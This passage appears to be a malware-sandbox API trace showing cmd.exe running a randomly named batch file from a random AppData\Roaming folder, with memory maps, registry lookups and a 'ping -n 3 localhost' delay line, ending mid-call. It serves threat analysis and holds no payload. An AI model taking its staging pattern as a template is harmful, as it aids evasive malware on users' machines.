"kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8389 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8390 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8391 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" 
(normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8392 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8393 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8394 start_va = 0x1f0000 end_va = 0x2b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 8395 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8396 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8397 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 8398 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 8399 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 8400 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 8401 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 8402 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 8403 start_va = 0x11a0000 end_va = 0x1302fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 8449 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8450 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8451 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8452 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 8453 start_va = 0x1310000 end_va = 0x15defff entry_point = 0x1310000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 86 os_tid = 0xe30 [0116.625] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efd24 | out: lpSystemTimeAsFileTime=0x1efd24*(dwLowDateTime=0x82d2f0e0, dwHighDateTime=0x1d440a9)) [0116.625] GetCurrentProcessId () returned 0xe2c [0116.626] GetCurrentThreadId () returned 0xe30 [0116.626] GetTickCount () returned 0x27a9b [0116.626] QueryPerformanceCounter (in: lpPerformanceCount=0x1efd1c | out: lpPerformanceCount=0x1efd1c*=17341477887) returned 1 [0116.626] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0116.626] __set_app_type (_Type=0x1) [0116.626] __p__fmode () returned 0x76b331f4 [0116.626] __p__commode () returned 0x76b331fc [0116.626] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0116.626] __getmainargs (in: _Argc=0x4a9e4238, 
_Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0116.627] GetCurrentThreadId () returned 0xe30 [0116.627] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe30) returned 0x38 [0116.627] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0116.627] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0116.627] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.627] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.627] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efcb4 | out: phkResult=0x1efcb4*=0x0) returned 0x2 [0116.627] VirtualQuery (in: lpAddress=0x1efceb, lpBuffer=0x1efc84, dwLength=0x1c | out: lpBuffer=0x1efc84*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0116.627] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efc84, dwLength=0x1c | out: lpBuffer=0x1efc84*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0116.627] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efc84, dwLength=0x1c | out: lpBuffer=0x1efc84*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0116.627] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efc84, dwLength=0x1c | out: lpBuffer=0x1efc84*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0116.627] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efc84, dwLength=0x1c | out: lpBuffer=0x1efc84*(BaseAddress=0x1f0000, 
AllocationBase=0x1f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0116.627] GetConsoleOutputCP () returned 0x1b5 [0116.627] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0116.627] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0116.627] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.627] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0116.628] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.628] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0116.628] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.628] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0116.628] _get_osfhandle (_FileHandle=0) returned 0x3 [0116.628] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0116.628] _get_osfhandle (_FileHandle=0) returned 0x3 [0116.628] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0116.628] GetEnvironmentStringsW () returned 0x3a0150* [0116.628] FreeEnvironmentStringsW (penv=0x3a0150) returned 1 [0116.628] GetEnvironmentStringsW () returned 0x3a0150* [0116.629] FreeEnvironmentStringsW (penv=0x3a0150) returned 1 [0116.629] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eec24 | out: phkResult=0x1eec24*=0x40) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x0, lpData=0x1eec30*=0x0, lpcbData=0x1eec28*=0x1000) returned 0x2 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x4, lpData=0x1eec30*=0x1, lpcbData=0x1eec28*=0x4) returned 0x0 [0116.629] RegQueryValueExW 
(in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x0, lpData=0x1eec30*=0x1, lpcbData=0x1eec28*=0x1000) returned 0x2 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x4, lpData=0x1eec30*=0x0, lpcbData=0x1eec28*=0x4) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x4, lpData=0x1eec30*=0x40, lpcbData=0x1eec28*=0x4) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x4, lpData=0x1eec30*=0x40, lpcbData=0x1eec28*=0x4) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x0, lpData=0x1eec30*=0x40, lpcbData=0x1eec28*=0x1000) returned 0x2 [0116.629] RegCloseKey (hKey=0x40) returned 0x0 [0116.629] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eec24 | out: phkResult=0x1eec24*=0x40) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x0, lpData=0x1eec30*=0x40, lpcbData=0x1eec28*=0x1000) returned 0x2 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x4, lpData=0x1eec30*=0x1, lpcbData=0x1eec28*=0x4) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, 
lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x0, lpData=0x1eec30*=0x1, lpcbData=0x1eec28*=0x1000) returned 0x2 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x4, lpData=0x1eec30*=0x0, lpcbData=0x1eec28*=0x4) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x4, lpData=0x1eec30*=0x9, lpcbData=0x1eec28*=0x4) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x4, lpData=0x1eec30*=0x9, lpcbData=0x1eec28*=0x4) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x0, lpData=0x1eec30*=0x9, lpcbData=0x1eec28*=0x1000) returned 0x2 [0116.629] RegCloseKey (hKey=0x40) returned 0x0 [0116.629] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635c [0116.629] srand (_Seed=0x5b88635c) [0116.629] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd\"" [0116.629] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd\"" [0116.629] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0116.630] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a19b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0116.630] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0116.630] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0116.630] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0116.630] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.630] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0116.630] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0116.630] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0116.630] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0116.630] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0116.630] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0116.630] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0116.630] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0116.630] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0116.630] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef9f0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0116.630] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef9f0, lpFilePart=0x1ef9ec | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef9ec*="Desktop") returned 0x18 [0116.630] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0116.631] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef76c | out: lpFindFileData=0x1ef76c) returned 0x39ffe0 [0116.631] FindClose (in: hFindFile=0x39ffe0 | out: hFindFile=0x39ffe0) returned 1 
[0116.631] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef76c | out: lpFindFileData=0x1ef76c) returned 0x39ffe0 [0116.631] FindClose (in: hFindFile=0x39ffe0 | out: hFindFile=0x39ffe0) returned 1 [0116.631] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef76c | out: lpFindFileData=0x1ef76c) returned 0x39ffe0 [0116.631] FindClose (in: hFindFile=0x39ffe0 | out: hFindFile=0x39ffe0) returned 1 [0116.631] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0116.631] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0116.631] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0116.631] GetEnvironmentStringsW () returned 0x3a0150* [0116.631] FreeEnvironmentStringsW (penv=0x3a0150) returned 1 [0116.631] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0116.634] GetConsoleOutputCP () returned 0x1b5 [0116.634] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0116.634] GetUserDefaultLCID () returned 0x409 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efb30, cchData=128 | out: lpLCData="0") returned 2 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efb30, cchData=128 | out: lpLCData="0") returned 2 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efb30, cchData=128 | out: lpLCData="1") returned 2 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 
[0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0116.636] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0116.637] GetConsoleTitleW (in: lpConsoleTitle=0x3a01e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.637] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0116.637] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0116.637] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0116.637] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0116.640] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd", _String2=")") returned 58 [0116.640] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd") returned 3 [0116.640] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd") returned 3 [0116.640] _wcsicmp (_String1="IF", 
_String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd") returned 6 [0116.640] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd") returned 6 [0116.640] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd") returned 15 [0116.641] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd") returned 15 [0116.641] GetConsoleTitleW (in: lpConsoleTitle=0x1ef828, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.641] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.642] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.642] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef5e4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef5dc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef5dc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0116.642] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0116.642] SetErrorMode (uMode=0x0) returned 0x0 [0116.642] SetErrorMode (uMode=0x1) returned 0x0 [0116.642] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x3adc08, lpFilePart=0x1ef348 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x1ef348*="vMfCCeRYkvQy") returned 0x2d [0116.642] SetErrorMode (uMode=0x0) returned 0x1 [0116.643] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0116.643] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0116.647] GetDriveTypeW 
(lpRootPathName="C:\\") returned 0x3 [0116.648] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd", fInfoLevelId=0x1, lpFindFileData=0x1ef0e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef0e4) returned 0x3a08f0 [0116.648] FindClose (in: hFindFile=0x3a08f0 | out: hFindFile=0x3a08f0) returned 1 [0116.648] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0116.648] GetConsoleTitleW (in: lpConsoleTitle=0x1ef5bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.775] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0116.778] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0116.778] IdentifyCodeAuthzLevelW () returned 0x1 [0116.784] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0116.784] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0116.785] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0116.785] CloseCodeAuthzLevel () returned 0x1 [0116.785] SetErrorMode (uMode=0x0) returned 0x0 [0116.785] SetErrorMode (uMode=0x1) returned 0x0 [0116.785] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd", nBufferLength=0x104, lpBuffer=0x3a04e8, lpFilePart=0x1ef4a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd", lpFilePart=0x1ef4a8*="sQFgqtRn.cmd") returned 0x3a [0116.785] SetErrorMode (uMode=0x0) returned 0x1 [0116.785] CmdBatNotification () returned 0x0 [0116.785] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\sqfgqtrn.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef4ec, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0x58 [0116.785] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0116.785] _get_osfhandle (_FileHandle=3) returned 0x58 [0116.785] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.785] _get_osfhandle (_FileHandle=3) returned 0x58 [0116.785] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.785] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef4d0, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1ef4d0*=0x91, lpOverlapped=0x0) returned 1 [0116.787] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0116.787] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=21, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0116.787] _get_osfhandle (_FileHandle=3) returned 0x58 [0116.787] GetFileType (hFile=0x58) returned 0x1 [0116.787] _get_osfhandle (_FileHandle=3) returned 0x58 [0116.787] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0116.787] _wcsicmp (_String1="ping", _String2=")") returned 71 [0116.787] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0116.787] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0116.787] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0116.787] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0116.787] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0116.787] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0116.788] _tell (_FileHandle=3) returned 21 [0116.788] _close (_FileHandle=3) returned 0 [0116.789] _vsnwprintf (in: _Buffer=0x4a9f4640, 
